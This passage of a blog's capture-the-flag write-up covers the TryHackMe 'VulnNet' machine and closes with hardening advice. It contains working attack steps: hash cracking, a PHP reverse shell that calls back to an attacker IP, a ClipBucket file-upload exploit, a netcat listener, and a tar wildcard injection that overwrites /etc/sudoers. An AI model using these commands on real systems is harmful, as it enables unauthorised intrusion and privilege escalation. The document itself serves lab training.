	<span class="n">DocumentRoot</span> /<span class="n">var</span>/<span class="n">www</span>/<span class="n">html</span>
	<span class="n">ErrorLog</span> ${<span class="n">APACHE_LOG_DIR</span>}/<span class="n">error</span>.<span class="n">log</span>
	<span class="n">CustomLog</span> ${<span class="n">APACHE_LOG_DIR</span>}/<span class="n">access</span>.<span class="n">log</span> <span class="n">combined</span>
	&lt;<span class="n">Directory</span> /<span class="n">var</span>/<span class="n">www</span>/<span class="n">html</span>&gt;
		<span class="n">Order</span> <span class="n">allow</span>,<span class="n">deny</span>
		<span class="n">allow</span> <span class="n">from</span> <span class="n">all</span>
		<span class="n">AuthType</span> <span class="n">Basic</span>
		<span class="n">AuthName</span> <span class="s2">"Restricted Content"</span>
		<span class="n">AuthUserFile</span> /<span class="n">etc</span>/<span class="n">apache2</span>/.<span class="n">htpasswd</span>
		<span class="n">Require</span> <span class="n">valid</span>-<span class="n">user</span>
	&lt;/<span class="n">Directory</span>&gt;
&lt;/<span class="n">VirtualHost</span>&gt;
---<span class="n">snip</span>---
</pre></td></tr></tbody></table></code></div></div>

<p>Loading the <code class="language-plaintext highlighter-rouge">.htaccess</code> file we can see the username and password required for logging in.
Trying this as the username and password doesn’t work. A string starting with <code class="language-plaintext highlighter-rouge">$apr1$</code> is going to be a hash of the password. <code class="language-plaintext highlighter-rouge">hashcat</code> should be able to crack this.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>developers:<span class="nv">$apr1$[</span>REDACTED]
</pre></td></tr></tbody></table></code></div></div>

<p>Checking the example list of hashes from <code class="language-plaintext highlighter-rouge">hashcat</code> we can see this is <code class="language-plaintext highlighter-rouge">1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)</code>.  Given enough time the password is eventually cracked, and we’re able to log into <code class="language-plaintext highlighter-rouge">broadcast.vulnnet.thm</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>hashcat <span class="s1">'$apr1$[REDACTED]'</span> /usr/share/wordlists/rockyou.txt <span class="nt">-m</span> 1600
<span class="nt">---snip---</span>
<span class="nv">$apr1$[</span>REDACTED]:[REDACTED]
</pre></td></tr></tbody></table></code></div></div>

<h3 id="password-spraying"><span class="mr-2">Password Spraying</span><a href="#password-spraying" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>Now we have a username and password we should try them on every possible service.</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Service</th>
      <th>Success</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>SSH</td>
      <td>No</td>
    </tr>
    <tr>
      <td>vulnnet.thm</td>
      <td>No</td>
    </tr>
    <tr>
      <td>broadcast.vulnnet.thm</td>
      <td>Yes</td>
    </tr>
  </tbody>
</table></div>

<h2 id="0x04-clipbucket"><span class="mr-2">[0x04] Clipbucket</span><a href="#0x04-clipbucket" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>After logging in we see that we’re now on some sort of media sharing site.  I’m immediately thing file upload for reverse shell.</p>

<p><img data-src="/assets/img/vulnnet/03.png" alt="Clipbucket" width="700" data-proofer-ignore></p>

<p>Trying the password on the <code class="language-plaintext highlighter-rouge">Login</code> button doesn’t work.  Now it’s time to run our recon with <code class="language-plaintext highlighter-rouge">gobuster</code> in dir mode.
After spending a few minutes trying to <code class="language-plaintext highlighter-rouge">sign up</code> we are unable to get past the error.  Given this is blocked behind developer credentials we’ll assume the site is not fully functional.</p>

<p>Reviewing our <code class="language-plaintext highlighter-rouge">gobuster</code> scan and filtering out the status codes of <code class="language-plaintext highlighter-rouge">403 Forbidden</code> we can see a files’ directory.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://broadcast.vulnnet.thm <span class="nt">-w</span> /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt <span class="nt">-U</span> developers <span class="nt">-P</span> <span class="o">[</span>REDACTED] <span class="nt">-o</span> broadcast.dirs

<span class="nb">grep</span> <span class="nt">-v</span> 403 broadcast.dirs
/images               <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 331] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/images/]
/includes             <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/includes/]
/cache                <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 330] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/cache/]
/plugins              <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 332] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/plugins/]
/js                   <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 327] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/js/]
/ajax                 <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 329] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/ajax/]
/files                <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 330] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/files/]
/LICENSE              <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 2588]
/api                  <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 328] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/api/]
/styles               <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 331] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/styles/]
/readme               <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 2968]
/.                    <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 27216]
/player               <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 331] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/player/]
/actions              <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 332] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/actions/]
/admin_area           <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 335] <span class="o">[</span><span class="nt">--</span><span class="o">&gt;</span> http://broadcast.vulnnet.thm/admin_area/]
</pre></td></tr></tbody></table></code></div></div>

<h3 id="file-upload"><span class="mr-2">File Upload</span><a href="#file-upload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>With no way to <code class="language-plaintext highlighter-rouge">sign up</code> and our <code class="language-plaintext highlighter-rouge">LFI</code> only able to read files, we’ll need a vulnerability for this site.  Checking the pages source code we find <code class="language-plaintext highlighter-rouge">ClipBucket version 4.0</code>. Searching <a href="https://www.exploit-db.com/">exploit-db</a> we find <code class="language-plaintext highlighter-rouge">ClipBucket &lt; 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection</code>.</p>

<h3 id="setup"><span class="mr-2">Setup</span><a href="#setup" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>We require a reverse shell to upload and since this is PHP server, so we’ll copy <code class="language-plaintext highlighter-rouge">/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php</code> to out current working directory as <code class="language-plaintext highlighter-rouge">rev.php</code> and edit the variables to match our <code class="language-plaintext highlighter-rouge">IP</code> and the <code class="language-plaintext highlighter-rouge">port</code> we want to use.</p>

<div class="language-php highlighter-rouge"><div class="code-header">
        <span data-label-text="PHP"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre><span class="o">---</span><span class="n">snip</span><span class="o">---</span>
<span class="nb">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">"1.0"</span><span class="p">;</span>
<span class="nv">$ip</span> <span class="o">=</span> <span class="s1">'10.8.208.76'</span><span class="p">;</span>  <span class="c1">// CHANGE THIS LOCAL IP TO CONNECT BACK TO</span>
<span class="nv">$port</span> <span class="o">=</span> <span class="mi">4242</span><span class="p">;</span>       <span class="c1">// CHANGE THIS</span>
<span class="nv">$chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span>
<span class="nv">$write_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$error_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nv">$shell</span> <span class="o">=</span> <span class="s1">'uname -a; w; id; /bin/sh -i'</span><span class="p">;</span>
<span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="nv">$debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="o">---</span><span class="n">snip</span><span class="o">---</span>
</pre></td></tr></tbody></table></code></div></div>

<p>We’ll run <code class="language-plaintext highlighter-rouge">netcat</code> to catch our reverse shell and then run the exploit using <code class="language-plaintext highlighter-rouge">curl</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>curl <span class="nt">-F</span> <span class="s2">"file=@rev.php"</span> <span class="nt">-F</span> <span class="s2">"plupload=1"</span> <span class="nt">-F</span> <span class="s2">"name=rev.php"</span> http://broadcast.vulnnet.thm/actions/photo_uploader.php <span class="nt">-u</span> developers:[REDACTED]
<span class="o">{</span><span class="s2">"success"</span>:<span class="s2">"yes"</span>,<span class="s2">"file_name"</span>:<span class="s2">"1622174479d86fa0"</span>,<span class="s2">"extension"</span>:<span class="s2">"php"</span>,<span class="s2">"file_directory"</span>:<span class="s2">"2022</span><span class="se">\/</span><span class="s2">02</span><span class="se">\/</span><span class="s2">28"</span><span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>nc <span class="nt">-lvnp</span> 4242
</pre></td></tr></tbody></table></code></div></div>

<p>Once we see the file is uploaded we can navigate to <code class="language-plaintext highlighter-rouge">http://broadcast.vulnnet.thm/files/photos/2022/02/28/1622174479d86fa0.php</code> and load the file.  If everything was successful we’ll have a shell waiting.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="nb">whoami
</span>www-data
</pre></td></tr></tbody></table></code></div></div>

<h2 id="0x05-privilege-escalation"><span class="mr-2">[0x05] Privilege Escalation</span><a href="#0x05-privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>For quality of life work we’ll need a stable shell.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>python3 <span class="nt">-c</span> <span class="s1">'import pty;pty.spawn("/bin/bash")'</span>
<span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm-256color
<span class="o">{</span>CTRL+Z<span class="o">}</span>
<span class="nb">stty </span>raw <span class="nt">-echo</span><span class="p">;</span><span class="nb">fg</span>
<span class="o">{</span>ENTER<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>
<blockquote class="prompt-info"><div>
  <p>{CTRL+Z} and {ENTER} are pressed keyboard keys</p>
</div></blockquote>

<h3 id="finding-backup-files"><span class="mr-2">Finding Backup Files</span><a href="#finding-backup-files" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<p>Running <code class="language-plaintext highlighter-rouge">sudo -l</code> we’re prompted for the password.  Next we’ll try to find any interesting backup files written in the last 7 days.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>find / <span class="nt">-type</span> f <span class="se">\(</span> <span class="nt">-iname</span> <span class="s2">"*.bak"</span> <span class="nt">-o</span> <span class="nt">-iname</span> <span class="s2">"*.tar.gz"</span> <span class="se">\)</span> <span class="nt">-mtime</span> <span class="nt">-10080</span> <span class="nt">-exec</span> <span class="nb">ls</span> <span class="nt">-ldb</span> <span class="nt">--color</span> <span class="o">{}</span> <span class="se">\;</span> 2&gt;/dev/null
<span class="nt">---snip---</span>
<span class="nt">-rw-r--r--</span> 1 root root 16643 Feb 23  2018 /usr/share/usb_modeswitch/configPack.tar.gz
<span class="nt">-rw-------</span> 1 root shadow 1118 Jan 23  2021 /var/backups/shadow.bak
<span class="nt">-rw-rw-r--</span> 1 server-management server-management 1484 Jan 24  2021 /var/backups/ssh-backup.tar.gz
<span class="nt">-rw-------</span> 1 root root 1831 Jan 23  2021 /var/backups/passwd.bak
<span class="nt">-rw-------</span> 1 root shadow 712 Jan 23  2021 /var/backups/gshadow.bak
<span class="nt">-rw-------</span> 1 root root 857 Jan 23  2021 /var/backups/group.bak
<span class="nt">---snip---</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Copying <code class="language-plaintext highlighter-rouge">/var/backups/ssh-backup.tar.gz</code> to <code class="language-plaintext highlighter-rouge">/dev/shm/</code> and unpacking reveals an <code class="language-plaintext highlighter-rouge">id_rsa</code> ssh key.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">tar</span> <span class="nt">-xzf</span> /dev/shm/ssh-backup.tar.gz
</pre></td></tr></tbody></table></code></div></div>
<p>Copying over the <code class="language-plaintext highlighter-rouge">id_rsa</code> to our machine and attempting to use it to ssh requires a password.  We can use <code class="language-plaintext highlighter-rouge">ssh2john</code> and then <code class="language-plaintext highlighter-rouge">john</code> to crack this password.</p>

<h3 id="cracking-ssh-keys"><span class="mr-2">Cracking SSH Keys</span><a href="#cracking-ssh-keys" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>python2.7 /usr/share/john/ssh2john.py id_rsa <span class="o">&gt;</span> id_rsa.hash
</pre></td></tr></tbody></table></code></div></div>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt id_rsa.hash

Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>SSH <span class="o">[</span>RSA/DSA/EC/OPENSSH <span class="o">(</span>SSH private keys<span class="o">)</span> 32/64]<span class="o">)</span>
Cost 1 <span class="o">(</span>KDF/cipher <span class="o">[</span><span class="nv">0</span><span class="o">=</span>MD5/AES <span class="nv">1</span><span class="o">=</span>MD5/3DES <span class="nv">2</span><span class="o">=</span>Bcrypt/AES]<span class="o">)</span> is 0 <span class="k">for </span>all loaded hashes
Cost 2 <span class="o">(</span>iteration count<span class="o">)</span> is 1 <span class="k">for </span>all loaded hashes
<span class="nt">---snip---</span>
<span class="o">[</span>REDACTED]     <span class="o">(</span>id_rsa<span class="o">)</span>
<span class="nt">---snip---</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Now we have the password and the file was owned by <code class="language-plaintext highlighter-rouge">server-management</code> lets try ssh into the machine.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>ssh server-management@vulnnet.thm <span class="nt">-i</span> id_rsa
Enter passphrase <span class="k">for </span>key <span class="s2">"id_rsa"</span>:
<span class="nb">ls
</span>user.txt
<span class="nb">cat </span>user.txt
THM[REDACTED]
</pre></td></tr></tbody></table></code></div></div>

<h2 id="0x06-privilege-escalation-to-root"><span class="mr-2">[0x06] Privilege Escalation to Root</span><a href="#0x06-privilege-escalation-to-root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>Taking a look at the key parts of the backup script we can see that it will run <code class="language-plaintext highlighter-rouge">tar *</code> in <code class="language-plaintext highlighter-rouge">/home/server-management/Documents</code>. There is a neat trick with <code class="language-plaintext highlighter-rouge">tar</code> on <a href="https://gtfobins.github.io/gtfobins/tar/">gtfobins</a>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="nt">---snip---</span>
<span class="nb">cd</span> /home/server-management/Documents
<span class="nv">backup_files</span><span class="o">=</span><span class="s2">"*"</span>
<span class="nt">---snip---</span>
<span class="c"># Backup the files using tar.</span>
<span class="nb">tar </span>czf <span class="nv">$dest</span>/<span class="nv">$archive_file</span> <span class="nv">$backup_files</span>
<span class="nt">---snip---</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Here we will create a script that when run as <code class="language-plaintext highlighter-rouge">root</code> it will overwrite the <code class="language-plaintext highlighter-rouge">/etc/sudoers</code> file with <code class="language-plaintext highlighter-rouge">server-management ALL=(root) NOPASSWD: ALL</code> allowing <code class="language-plaintext highlighter-rouge">server-management</code> to run any command as the <code class="language-plaintext highlighter-rouge">root</code> user.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nb">cd</span> ~/Documents
<span class="nb">echo</span> <span class="s1">'echo "server-management ALL=(root) NOPASSWD: ALL" &gt; /etc/sudoers'</span> <span class="o">&gt;</span> exploit.sh
<span class="nb">echo</span> <span class="s2">""</span> <span class="o">&gt;</span> <span class="s2">" - checkpoint-action=exec=sh exploit.sh"</span>
<span class="nb">echo</span> <span class="s2">""</span> <span class="o">&gt;</span> - <span class="nv">checkpoint</span><span class="o">=</span>1
</pre></td></tr></tbody></table></code></div></div>

<p>After a short pause we can run</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="nb">sudo cat</span> /root/root.txt
THM[REDACTED]
</pre></td></tr></tbody></table></code></div></div>

<h2 id="0x07-server-hardening"><span class="mr-2">[0x07] Server Hardening</span><a href="#0x07-server-hardening" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>In this section we will make recommendations on how to harden the server and mitigate these vulnerabilities.</p>

<h3 id="clipbucket"><span class="mr-2">ClipBucket</span><a href="#clipbucket" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><code class="language-plaintext highlighter-rouge">ClipBucket</code> should be upgraded to version <code class="language-plaintext highlighter-rouge">4.1</code> from <code class="language-plaintext highlighter-rouge">4.0</code> as patch notes mention that the vulnerabilities used in our attack have been patched.</p>

<h3 id="passwords"><span class="mr-2">Passwords</span><a href="#passwords" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>
<p>The passwords used for both the <code class="language-plaintext highlighter-rouge">developers</code> and <code class="language-plaintext highlighter-rouge">server-management</code> accounts should be increased in length and complexity.  Using a password manager that is able to check against known passwords lists should also be considered.</p>

<h3 id="lfi"><span class="mr-2">LFI</span><a href="#lfi" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>
<p>This section of the code found in the <code class="language-plaintext highlighter-rouge">index.html</code> should be removed as it doesn’t provide any functionality.</p>

<div class="language-php highlighter-rouge"><div class="code-header">
        <span data-label-text="PHP"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="cp">&lt;?php</span>
<span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'referer'</span><span class="p">];</span>
<span class="nv">$filter</span> <span class="o">=</span> <span class="nb">str_replace</span><span class="p">(</span><span class="s1">'../'</span><span class="p">,</span><span class="s1">''</span><span class="p">,</span><span class="nv">$file</span><span class="p">);</span>
<span class="k">include</span><span class="p">(</span><span class="nv">$filter</span><span class="p">);</span>
<span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="backup"><span class="mr-2">Backup</span><a href="#backup" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3>
<p><code class="language-plaintext highlighter-rouge">tar</code> should not be used to back up files using the <code class="language-plaintext highlighter-rouge">*</code> on the GNU version. Moving to another program such as <code class="language-plaintext highlighter-rouge">gunzip</code> is recommended as no know <code class="language-plaintext highlighter-rouge">privsec</code> is known at this time.</p>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories -->
  
  <div class="post-meta mb-3">
    <i class="far fa-folder-open fa-fw mr-1"></i>
    
      <a href='/categories/capturetheflag/'>capturetheflag</a>,
      <a href='/categories/tryhackme/'>tryhackme</a>
  </div>
  

  <!-- tags -->
  
  <div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i>
      
      <a href="/tags/lfi/"
          class="post-tag no-text-decoration" >lfi</a>
      
      <a href="/tags/tar/"
          class="post-tag no-text-decoration" >tar</a>
      
      <a href="/tags/john/"
          class="post-tag no-text-decoration" >john</a>
      
      <a href="/tags/hashcat/"
          class="post-tag no-text-decoration" >hashcat</a>
      
  </div>
  

  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=VulnNet - InfoSec Journey&amp;url=https://glenntoms.github.io/posts/vulnnet/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=VulnNet - InfoSec Journey&amp;u=https://glenntoms.github.io/posts/vulnnet/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://t.me/share/url?url=https://glenntoms.github.io/posts/vulnnet/&amp;text=VulnNet - InfoSec Journey" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        data-title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">

    <div class="access">
      















  <div id="access-lastmod" class="post">
    <div class="panel-heading">Recently Updated</div>
    <ul class="post-content pl-0 pb-1 ml-1 mt-2">
      
        
        
        
      <li><a href="/posts/vulnnet/">VulnNet</a></li>
      
    </ul>
  </div> <!-- #access-lastmod -->



      















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/tags/hashcat/">hashcat</a>
    
      
      <a class="post-tag" href="/tags/john/">john</a>
    
      
      <a class="post-tag" href="/tags/lfi/">lfi</a>
    
      
      <a class="post-tag" href="/tags/tar/">tar</a>
    

    </div>
  </div>


    </div>

    
      
      



<!-- BS-toc.js will be loaded at medium priority -->
<script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div>


    
  </div>

</div>

<!-- tail -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">
      
        
        <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  
    






<!-- Fill with the other newlest posts  -->




  
    
    
  






      
        
        <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <span class="btn btn-outline-primary disabled"
    prompt="Older">
    <p>-</p>
  </span>
  

  
  <span class="btn btn-outline-primary disabled"
    prompt="Newer">
    <p>-</p>
  </span>
  

</div>

      
        
        <!--  The comments switcher -->


      
    </div>
  </div>
</div> <!-- .row -->



        <!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center text-muted">
    <div class="footer-left">
      <p class="mb-0">
        © 2022
        <a href="https://twitter.com/glenn__toms">Glenn Toms</a>.
        
        <span data-toggle="tooltip" data-placement="top"
